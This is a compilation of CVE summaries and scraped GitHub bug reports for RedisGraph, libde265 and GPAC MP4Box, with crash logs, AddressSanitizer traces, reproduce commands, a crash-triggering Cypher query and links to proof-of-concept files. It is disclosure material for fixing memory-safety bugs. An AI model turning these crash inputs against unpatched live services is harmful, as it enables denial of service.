An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted.

    === REDIS BUG REPORT START: Cut & paste starting from here ===
    10:M 24 Apr 2023 18:54:43.433 # Redis 7.0.11 crashed by signal: 11, si_code: 128
    10:M 24 Apr 2023 18:54:43.433 # Accessing address: (nil)
    10:M 24 Apr 2023 18:54:43.433 # Crashed running the instruction at: 0x7f283d48aef5
    
    ------ STACK TRACE ------
    EIP:
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(DataBlock_ItemIsDeleted+0x25)[0x7f283d48aef5]
    
    Backtrace:
    redis-server *:6379(sigsegvHandler+0x8a)[0x56216429294a]
    /lib/x86_64-linux-gnu/libpthread.so.0(+0x13140)[0x7f28452a2140]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(DataBlock_ItemIsDeleted+0x25)[0x7f283d48aef5]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(Graph_EntityIsDeleted+0x40)[0x7f283d3a9000]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x6a02ee)[0x7f283d3212ee]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x69f5d0)[0x7f283d3205d0]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(OpBase_Free+0x7d)[0x7f283d307f5d]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x671bd7)[0x7f283d2f2bd7]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(ExecutionPlan_Free+0x4d)[0x7f283d2f2a2d]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x6407d4)[0x7f283d2c17d4]
    /app/bin/linux-x64-debug-asan/src/redisgraph.so(+0x831d8a)[0x7f283d4b2d8a]
    /lib/x86_64-linux-gnu/libpthread.so.0(+0x7ea7)[0x7f2845296ea7]
    /lib/x86_64-linux-gnu/libc.so.6(clone+0x3f)[0x7f28451b4a2f]
    
    ------ REGISTERS ------
    10:M 24 Apr 2023 18:54:43.436 #
    RAX:ffffffffffffffff RBX:00007f28371a44c0
    RCX:1fffffffffffffff RDX:0000000000000000
    RDI:0000000000000000 RSI:00007f28371a3520
    RBP:00007f28371a3e40 RSP:00007f28371a3e20
    R8 :0000000000000001 R9 :000000000000000a
    R10:000000000000001e R11:00007f28369a7000
    R12:00007ffc3cf1c2ce R13:00007ffc3cf1c2cf
    R14:00007f28371a46c0 R15:0000000000802000
    RIP:00007f283d48aef5 EFL:0000000000010a07
    CSGSFS:002b000000000033
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2f) -> 00007f2831828178
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2e) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2d) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2c) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2b) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e2a) -> 00007f2831828180
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e29) -> 00007f283d3212ee
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e28) -> 00007f28371a3fd0
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e27) -> 00007f2831834a0c
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e26) -> 00007f2831834a0c
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e25) -> 00007f283d3a9000
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e24) -> 00007f28371a3e60
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e23) -> 0000000000000000
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e22) -> ffffffffffffffff
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e21) -> 834cfcd8e8894900
    10:M 24 Apr 2023 18:54:43.436 # (00007f28371a3e20) -> 00007f28371a3d70
    
    ------ INFO OUTPUT ------
    # Server
    
    redis_version:7.0.11
    
    redis_git_sha1:00000000
    
    redis_git_dirty:0
    
    redis_build_id:5c712dc4cb9cfb70
    
    redis_mode:standalone
    
    os:Linux 6.2.10-arch1-1 x86_64
    
    arch_bits:64
    
    monotonic_clock:POSIX clock_gettime
    
    multiplexing_api:epoll
    
    atomicvar_api:c11-builtin
    
    gcc_version:10.2.1
    
    process_id:10
    
    process_supervised:no
    
    run_id:567d37ab65b9a1eff8459ee690db4f259efbed00
    
    tcp_port:6379
    
    server_time_usec:1682362483432067
    
    uptime_in_seconds:7
    
    uptime_in_days:0
    
    hz:10
    
    configured_hz:10
    
    lru_clock:4640883
    
    executable:/redis/redis-server
    
    config_file:
    
    io_threads_active:0
    
    
    
    # Clients
    
    connected_clients:1
    
    cluster_connections:0
    
    maxclients:10000
    
    client_recent_max_input_buffer:0
    
    client_recent_max_output_buffer:0
    
    blocked_clients:1
    
    tracking_clients:0
    
    clients_in_timeout_table:0
    
    
    
    # Memory
    
    used_memory:1497320
    
    used_memory_human:1.43M
    
    used_memory_rss:42692608
    
    used_memory_rss_human:40.71M
    
    used_memory_peak:1497320
    
    used_memory_peak_human:1.43M
    
    used_memory_peak_perc:110.76%
    
    used_memory_overhead:929048
    
    used_memory_startup:928792
    
    used_memory_dataset:568272
    
    used_memory_dataset_perc:99.95%
    
    allocator_allocated:1223920
    
    allocator_active:1409024
    
    allocator_resident:4825088
    
    total_system_memory:8039120896
    
    total_system_memory_human:7.49G
    
    used_memory_lua:31744
    
    used_memory_vm_eval:31744
    
    used_memory_lua_human:31.00K
    
    used_memory_scripts_eval:0
    
    number_of_cached_scripts:0
    
    number_of_functions:0
    
    number_of_libraries:0
    
    used_memory_vm_functions:32768
    
    used_memory_vm_total:64512
    
    used_memory_vm_total_human:63.00K
    
    used_memory_functions:184
    
    used_memory_scripts:184
    
    used_memory_scripts_human:184B
    
    maxmemory:0
    
    maxmemory_human:0B
    
    maxmemory_policy:noeviction
    
    allocator_frag_ratio:1.15
    
    allocator_frag_bytes:185104
    
    allocator_rss_ratio:3.42
    
    allocator_rss_bytes:3416064
    
    rss_overhead_ratio:8.85
    
    rss_overhead_bytes:37867520
    
    mem_fragmentation_ratio:45.96
    
    mem_fragmentation_bytes:41763672
    
    mem_not_counted_for_evict:0
    
    mem_replication_backlog:0
    
    mem_total_replication_buffers:0
    
    mem_clients_slaves:0
    
    mem_clients_normal:0
    
    mem_cluster_links:0
    
    mem_aof_buffer:0
    
    mem_allocator:jemalloc-5.2.1
    
    active_defrag_running:0
    
    lazyfree_pending_objects:0
    
    lazyfreed_objects:0
    
    
    
    # Persistence
    
    loading:0
    
    async_loading:0
    
    current_cow_peak:0
    
    current_cow_size:0
    
    current_cow_size_age:0
    
    current_fork_perc:0.00
    
    current_save_keys_processed:0
    
    current_save_keys_total:0
    
    rdb_changes_since_last_save:0
    
    rdb_bgsave_in_progress:0
    
    rdb_last_save_time:1682362476
    
    rdb_last_bgsave_status:ok
    
    rdb_last_bgsave_time_sec:-1
    
    rdb_current_bgsave_time_sec:-1
    
    rdb_saves:0
    
    rdb_last_cow_size:0
    
    rdb_last_load_keys_expired:0
    
    rdb_last_load_keys_loaded:0
    
    aof_enabled:0
    
    aof_rewrite_in_progress:0
    
    aof_rewrite_scheduled:0
    
    aof_last_rewrite_time_sec:-1
    
    aof_current_rewrite_time_sec:-1
    
    aof_last_bgrewrite_status:ok
    
    aof_rewrites:0
    
    aof_rewrites_consecutive_failures:0
    
    aof_last_write_status:ok
    
    aof_last_cow_size:0
    
    module_fork_in_progress:0
    
    module_fork_last_cow_size:0
    
    
    
    # Stats
    
    total_connections_received:1
    
    total_commands_processed:2
    
    instantaneous_ops_per_sec:0
    
    total_net_input_bytes:246
    
    total_net_output_bytes:93
    
    total_net_repl_input_bytes:0
    
    total_net_repl_output_bytes:0
    
    instantaneous_input_kbps:0.00
    
    instantaneous_output_kbps:0.00
    
    instantaneous_input_repl_kbps:0.00
    
    instantaneous_output_repl_kbps:0.00
    
    rejected_connections:0
    
    sync_full:0
    
    sync_partial_ok:0
    
    sync_partial_err:0
    
    expired_keys:0
    
    expired_stale_perc:0.00
    
    expired_time_cap_reached_count:0
    
    expire_cycle_cpu_milliseconds:0
    
    evicted_keys:0
    
    evicted_clients:0
    
    total_eviction_exceeded_time:0
    
    current_eviction_exceeded_time:0
    
    keyspace_hits:3
    
    keyspace_misses:1
    
    pubsub_channels:0
    
    pubsub_patterns:0
    
    pubsubshard_channels:0
    
    latest_fork_usec:0
    
    total_forks:0
    
    migrate_cached_sockets:0
    
    slave_expires_tracked_keys:0
    
    active_defrag_hits:0
    
    active_defrag_misses:0
    
    active_defrag_key_hits:0
    
    active_defrag_key_misses:0
    
    total_active_defrag_time:0
    
    current_active_defrag_time:0
    
    tracking_total_keys:0
    
    tracking_total_items:0
    
    tracking_total_prefixes:0
    
    unexpected_error_replies:0
    
    total_error_replies:0
    
    dump_payload_sanitizations:0
    
    total_reads_processed:2
    
    total_writes_processed:1
    
    io_threaded_reads_processed:0
    
    io_threaded_writes_processed:0
    
    reply_buffer_shrinks:0
    
    reply_buffer_expands:0
    
    
    
    # Replication
    
    role:master
    
    connected_slaves:0
    
    master_failover_state:no-failover
    
    master_replid:545e76b89a7a511fa91ced8a5dfd8c5b7429f8ee
    
    master_replid2:0000000000000000000000000000000000000000
    
    master_repl_offset:0
    
    second_repl_offset:-1
    
    repl_backlog_active:0
    
    repl_backlog_size:1048576
    
    repl_backlog_first_byte_offset:0
    
    repl_backlog_histlen:0
    
    
    
    # CPU
    
    used_cpu_sys:0.015967
    
    used_cpu_user:0.031885
    
    used_cpu_sys_children:0.000000
    
    used_cpu_user_children:0.000000
    
    used_cpu_sys_main_thread:0.000000
    
    used_cpu_user_main_thread:0.002797
    
    
    
    # Modules
    
    module:name=graph,ver=21200,api=1,filters=0,usedby=[],using=[],options=[]
    
    
    
    # Commandstats
    
    cmdstat_graph.QUERY:calls=2,usec=1751,usec_per_call=875.50,rejected_calls=0,failed_calls=0
    
    
    
    # Errorstats
    
    
    
    # Latencystats
    
    latency_percentiles_usec_graph.QUERY:p50=1630.207,p99=1630.207,p99.9=1630.207
    
    
    
    # Cluster
    
    cluster_enabled:0
    
    
    
    # Keyspace
    
    db0:keys=1,expires=0,avg_ttl=0
    
    
    ------ CLIENT LIST OUTPUT ------
    id=6 addr=172.17.0.1:49156 laddr=172.17.0.2:6379 fd=8 name= age=0 idle=0 flags=b db=0 sub=0 psub=0 ssub=0 multi=-1 qbuf=0 qbuf-free=20474 argv-mem=140 multi-mem=0 rbs=16384 rbp=16384 obl=0 oll=0 omem=0 tot-mem=37804 events=r cmd=graph.QUERY user=default redir=-1 resp=2
    
    ------ MODULES INFO OUTPUT ------
    # graph_executing commands
    
    graph_command:GRAPH.QUERY CYPHER TIMEOUT_DEFAULT="30000" CREATE (x) CREATE ()-[:A{n1:size([n2 IN [n3 IN [0] | x.n4] | 0])}]->()-[y:B]->() DELETE y
    
    
    ------ CONFIG DEBUG OUTPUT ------
    io-threads-do-reads no
    repl-diskless-sync yes
    lazyfree-lazy-expire no
    lazyfree-lazy-user-del no
    client-query-buffer-limit 1gb
    activedefrag no
    proto-max-bulk-len 512mb
    lazyfree-lazy-eviction no
    io-threads 1
    sanitize-dump-payload no
    lazyfree-lazy-server-del no
    repl-diskless-load disabled
    replica-read-only yes
    slave-read-only yes
    list-compress-depth 0
    lazyfree-lazy-user-flush no
    
    ------ FAST MEMORY TEST ------
    10:M 24 Apr 2023 18:54:43.437 # main thread terminated
    10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #0 terminated
    10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #1 terminated
    10:M 24 Apr 2023 18:54:43.437 # Bio thread for job type #2 terminated
    
    Fast memory test PASSED, however your memory can still be broken. Please run a memory test for several hours if possible.
    
    ------ DUMPING CODE AROUND EIP ------
    Symbol: DataBlock_ItemIsDeleted (base: 0x7f283d48aed0)
    Module: /app/bin/linux-x64-debug-asan/src/redisgraph.so (base 0x7f283cc81000)
    $ xxd -r -p /tmp/dump.hex /tmp/dump.bin
    $ objdump --adjust-vma=0x7f283d48aed0 -D -b binary -m i386:x86-64 /tmp/dump.bin
    ------
    10:M 24 Apr 2023 18:54:43.437 # dump of function (hexdump of 165 bytes):
    554889e54883ec2048897df8488b45f84805ffffffff488945f0488b45f04889c148c1e9038a910080ff7f80fa00488945e88855e70f8423000000488b45e84825070000008a4de738c80f8c09000000488b7de8e87794d5ffe900000000488b45e88a0880e1010fb6d183e20183fa000f95c180e1010fb6d189d04883c4205dc3662e0f1f8400000000000f1f440000554889e54883ec3048897df8488975f0488b7df848
    
    === REDIS BUG REPORT END. Make sure to include from START to END. ===

CVE-2023-47003: Query crashes in `DataBlock_ItemIsDeleted` · Issue #3063 · RedisGraph/RedisGraph

Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.

**SEGV in libde265****Description**

Libde265 v1.0.12 was discovered to contain a SEGV via the function slice\_segment\_header::dump\_slice\_segment\_header at slice.cc.

**Version****ASAN Log**

./dec265/dec265 -c -d -f 153 poc1libde265

AddressSanitizer:DEADLYSIGNAL
=================================================================
==38==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000551716 bp 0x7ffff7ad66a0 sp 0x7fffffff3de0 T0)
==38==The signal is caused by a READ memory access.
==38==Hint: address points to the zero page.
    #0 0x551716 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const /afltest/libde265/libde265/slice.cc:1281:3
    #1 0x4db1b1 in decoder\_context::read\_slice\_NAL(bitreader&, NAL\_unit\*, nal\_header&) /afltest/libde265/libde265/decctx.cc:646:11
    #2 0x4e5626 in decoder\_context::decode\_NAL(NAL\_unit\*) /afltest/libde265/libde265/decctx.cc:1241:11
    #3 0x4e6247 in decoder\_context::decode(int\*) /afltest/libde265/libde265/decctx.cc:1329:16
    #4 0x4cd5c4 in main /afltest/libde265/dec265/dec265.cc:784:17
    #5 0x7ffff790d082 in \_\_libc\_start\_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16
    #6 0x41e66d in \_start (/afltest/libde265/dec265/dec265+0x41e66d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /afltest/libde265/libde265/slice.cc:1281:3 in slice\_segment\_header::dump\_slice\_segment\_header(decoder\_context const\*, int) const
==38==ABORTING

**Reproduction**

./autogen.sh
export CFLAGS="\-g -lpthread -fsanitize=address"
export CXXFLAGS="\-g -lpthread -fsanitize=address"
CC=clang CXX=clang++ ./configure --disable-shared
make -j 32

./dec265/dec265 -c -d -f 153 poc1libde265

**PoC**

poc1libde265: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc1libde265

**Reference**

https://github.com/strukturag/libde265

**Environment**

    ubuntu:20.04
    gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2)
    clang version 10.0.0-4ubuntu1
    afl-cc++4.09
    

**Credit**

Zeng Yunxiang  
Song Jiaxuan

CVE-2023-47471: SEGV in libde265 in slice_segment_header::dump_slice_segment_header · Issue #426 · strukturag/libde265

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c.

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master
    

**Platform**

    $ uname -a
    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

**Asan**

    /home/user/vul/MP4Box_crash/id000085sig06src003627time38285673execs366724ophavocrep8
    [31m[HEVC] Error parsing NAL unit type 2
    [0m=================================================================
    ==833362==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffdcf3828d0 at pc 0x7f6e8e6ab0c1 bp 0x7ffdcf382870 sp 0x7ffdcf382868
    WRITE of size 1 at 0x7ffdcf3828d0 thread T0
        #0 0x7f6e8e6ab0c0 in hevc_parse_vps_extension /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7735:42
        #1 0x7f6e8e66492e in gf_hevc_read_vps_bs_internal /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:8095:9
        #2 0x7f6e8e66b0e5 in gf_hevc_parse_nalu_bs /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:8756:30
        #3 0x7f6e8f25c2ca in naludmx_check_dur /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:576:10
        #4 0x7f6e8f264622 in naludmx_check_pid /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:1826:3
        #5 0x7f6e8f252dc5 in naludmx_process /home/user/fuzzing_gpac/gpac/src/filters/reframe_nalu.c:3370:4
        #6 0x7f6e8edafa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
        #7 0x7f6e8ed7d47b in gf_fs_thread_proc /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2105:3
        #8 0x7f6e8ed7b5cf in gf_fs_run /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2405:3
        #9 0x7f6e8e62ac6a in gf_dasher_process /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:1236:6
        #10 0x5572d97a66dc in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4831:15
        #11 0x5572d9797b6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7
        #12 0x7f6e8d629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #13 0x7f6e8d629e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #14 0x5572d96bfdd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
    
    Address 0x7ffdcf3828d0 is located in stack of thread T0 at offset 80 in frame
        #0 0x7f6e8e6a4abf in hevc_parse_vps_extension /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7690
    
      This frame has 12 object(s):
        [32, 48) 'dimension_id_len' (line 7693)
        [64, 80) 'dim_bit_offset' (line 7693) <== Memory access at offset 80 overflows this variable
        [96, 100) 'layer_set_idx_for_ols_minus1' (line 7695)
        [112, 117) 'nb_output_layers_in_output_layer_set' (line 7696)
        [144, 149) 'ols_highest_output_layer_id' (line 7697)
        [176, 240) 'num_direct_ref_layers' (line 7700)
        [272, 336) 'num_pred_layers' (line 7700)
        [368, 372) 'num_layers_in_tree_partition' (line 7700)
        [384, 400) 'dependency_flag' (line 7701)
        [416, 672) 'id_pred_layers' (line 7701)
        [736, 800) 'layer_id_in_list_flag' (line 7706)
        [832, 896) 'OutputLayerFlag' (line 7707)
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow /home/user/fuzzing_gpac/gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension
    Shadow bytes around the buggy address:
      0x100039e684c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e684d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e684e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e684f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e68500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    =>0x100039e68510: f1 f1 f1 f1 00 00 f2 f2 00 00[f2]f2 04 f2 05 f2
      0x100039e68520: f2 f2 05 f2 f2 f2 00 00 00 00 00 00 00 00 f2 f2
      0x100039e68530: f2 f2 00 00 00 00 00 00 00 00 f2 f2 f2 f2 04 f2
      0x100039e68540: 00 00 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e68550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x100039e68560: 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==833362==ABORTING
    

**Reproduce****POC File**

https://github.com/gandalf4a/crash\_report/blob/main/gpac/MP4Box/sbo\_7735

**Credit**

CVE-2023-48014: stack-buffer-overflow in /gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension · Issue #2613 · gpac/gpac

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c.

    $ ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master
    

    $ uname -a
    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

    /home/user/vul/MP4Box_crash/id000037sig06src002502time27968081execs258947ophavocrep16
    [32m[iso file] Unknown box type 00000000 in parent moov
    [0m[32m[iso file] Unknown top-level box type 00000100
    [0m[32m[Dasher] No template assigned, using $File$_dash$FS$$Number$
    [0m[32m[Dasher] No bitrate property assigned to PID V1, computing from bitstream
    [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2
    [0m[32m[iso file] Unknown box type 00000000 in parent moov
    [0m[33m[Dasher] Representation not initialized, dropping non-SAP1/2 packet CTS 18446744073709551615/12288
    [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2
    [0m[31m[MuxIsom] Packet with no CTS assigned, cannot store to track, ignoring
    [0m[31m[IsoMedia] File truncated, aborting read for track 1
    [0m[31m[IsoMedia] Failed to fetch initial sample 1 for track 2
    [0m[37mDashing P1 AS#1.1(V) done (1 segs)
    [0m[31m[Dasher] Couldn't compute bitrate of PID V1 in time for manifest generation, please specify #Bitrate property
    [0m[31m[Dasher] Couldn't compute bitrate of PID V1 in time for manifest generation, please specify #Bitrate property
    [0m[32m[MPD] Generating MPD at time 2023-10-08T12:38:38.043Z
    [0m[32m[Dasher] End of Period 
    [0m[32m[Dasher] End of MPD (no more active streams)
    [0m=================================================================
    ==827317==ERROR: AddressSanitizer: attempting double-free on 0x619000015980 in thread T0:
        #0 0x55e7797a5972 in free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f525cd97945 in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17
        #2 0x7f525cd6a022 in gf_fq_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter_queue.c:105:33
        #3 0x7f525cda14e5 in gf_filter_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:664:3
        #4 0x7f525cd6ede9 in gf_fs_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:782:4
        #5 0x7f525c6283f6 in gf_dasher_clean_inputs /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:164:3
        #6 0x7f525c6283f6 in gf_dasher_del /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:173:2
        #7 0x55e779809d2d in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4894:2
        #8 0x55e7797fab6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7
        #9 0x7f525b629d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #10 0x7f525b629e3f in __libc_start_main csu/../csu/libc-start.c:392:3
        #11 0x55e779722dd4 in _start (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x82dd4) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
    
    0x619000015980 is located 0 bytes inside of 1084-byte region [0x619000015980,0x619000015dbc)
    freed by thread T0 here:
        #0 0x55e7797a6046 in __interceptor_realloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x106046) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f525c4f7ab6 in Media_GetSample /home/user/fuzzing_gpac/gpac/src/isomedia/media.c:619:30
        #2 0x7f525c45d7b3 in gf_isom_get_sample_ex /home/user/fuzzing_gpac/gpac/src/isomedia/isom_read.c:1975:6
        #3 0x7f525d05a156 in isor_reader_get_sample /home/user/fuzzing_gpac/gpac/src/filters/isoffin_read_ch.c:398:19
        #4 0x7f525d04d2d5 in isoffin_process /home/user/fuzzing_gpac/gpac/src/filters/isoffin_read.c:1486:5
        #5 0x7f525cdafa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
    
    previously allocated by thread T0 here:
    LLVMSymbolizer: error reading file: No such file or directory
        #0 0x55e7797a6046 in __interceptor_realloc (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x106046) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9)
        #1 0x7f525cd00add in gf_filter_pck_expand /home/user/fuzzing_gpac/gpac/src/filter_core/filter_pck.c:1846:15
        #2 0x7ffd05c3a8df  ([stack]+0x328df)
    
    SUMMARY: AddressSanitizer: double-free (/home/user/fuzzing_gpac/gpac/bin/gcc/MP4Box+0x105972) (BuildId: 53333ca7bff59dd9a3d1b2821e7c5f3a9aac76b9) in free
    ==827317==ABORTING

CVE-2023-48013: double-free in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17 · Issue #2612 · gpac/gpac

GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

gandalf4a opened this issue

Oct 8, 2023

· 0 comments

**Comments**

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master
    

**Platform**

    $ uname -a
    Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
    

**Asan**

    [33m[iso file] extra box maxr found in hinf, deleting
    [0m[32m[iso file] Unknown box type traI in parent moov
    [0m[33m[iso file] Box "stss" (start 9939) has 32 extra bytes
    [0m[33m[iso file] extra box maxr found in hinf, deleting
    [0m[33m[iso file] Track with no sample description box !
    [0m[33m[IsoMedia] Track 4 type MPEG not natively handled
    [0m[32m[Dasher] No template assigned, using $File$_dash$FS$$Number$
    [0m[32m[iso file] Unknown box type traI in parent moov
    [0m[33m[MP4Mux] muxing unknown codec ID Codec Not Supported, using generic sample entry with 4CC "MPEG"
    [0m[31m[IsoMedia] File truncated, aborting read for track 1
    [0m[37mDashing P1 AS#1.1(V) done (1 segs)
    [0m[31m[MP4Mux] Failed to add sample DTS 0 from O7 - prev DTS 18446744073709551615: Out Of Memory
    [0m=================================================================
    ==836900==ERROR: AddressSanitizer: heap-use-after-free on address 0x60b000001d88 at pc 0x7f57c0120bf1 bp 0x7ffeac405a70 sp 0x7ffeac405a68
    READ of size 8 at 0x60b000001d88 thread T0
        #0 0x7f57c0120bf0 in flush_ref_samples /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:936:37
        #1 0x7f57c0128df2 in gf_isom_close_segment /home/user/fuzzing_gpac/gpac/src/isomedia/movie_fragments.c:2331:4
        #2 0x7f57c0cfd198 in mp4_mux_process_fragmented /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:6734:8
        #3 0x7f57c0cf46f3 in mp4_mux_process /home/user/fuzzing_gpac/gpac/src/filters/mux_isom.c:7273:14
        #4 0x7f57c09afa33 in gf_filter_process_task /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:2971:7
        #5 0x7f57c097d47b in gf_fs_thread_proc /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2105:3
        #6 0x7f57c097b5cf in gf_fs_run /home/user/fuzzing_gpac/gpac/src/filter_core/filter_session.c:2405:3
        #7 0x7f57c022ac6a in gf_dasher_process /home/user/fuzzing_gpac/gpac/src/media_tools/dash_segmenter.c:1236:6
        #8 0x55ff536546dc in do_dash /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:4831:15
        #9 0x55ff53645b6e in mp4box_main /home/user/fuzzing_gpac/gpac/applications/mp4box/mp4box.c:6245:7
        #10 0x7f57bf229d8f in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16
        #11 0x7f57bf229e3f in __libc_start_main csu/../csu/libc-start.c:392:3
